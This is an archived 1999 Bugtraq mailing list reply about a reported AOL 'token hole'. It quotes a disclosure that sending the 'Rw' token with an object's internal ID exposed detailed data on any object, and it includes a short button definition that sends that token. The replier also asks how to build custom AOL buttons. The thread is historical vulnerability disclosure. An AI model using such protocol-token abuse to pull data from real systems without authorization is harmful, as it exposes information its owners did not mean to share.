Home page logo

bugtraq logo Bugtraq mailing list archives

Re: America Online Token Hole
From: granny () PINKFLOYD COM (John Schuster)
Date: Mon, 12 Jul 1999 16:05:49 -0000

I had contacted the person who posted this information.  It 
seems that AOL has contacted him and he refuses to talk 
about this if you ask about it.

Does anyone have any information on how to make your own 
programmable buttons for aol?


About a year ago, I found out that by sending the "Rw" token 
to the AOL host while signed on along with the object's 
internal id as arg, any user could get detailed info about 
any object on the system.

man_start_object < trigger, "" >
mat_relative_tag < 22 >
sm_send_token_arg <"Rw", INTERNAL ID HERE>
<FONT COLOR="#222255">> </FONT>
mat_precise_x < 0 > 
mat_precise_y < 226 > 
mat_font_sis < small_fonts, 7, normal> 
mat_art_id < 1-0-21184 >
mat_bool_default < yes > 

comments questions..   <A 
HREF="mailto:mackk () rpi edu">mackk () rpi edu</A>

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]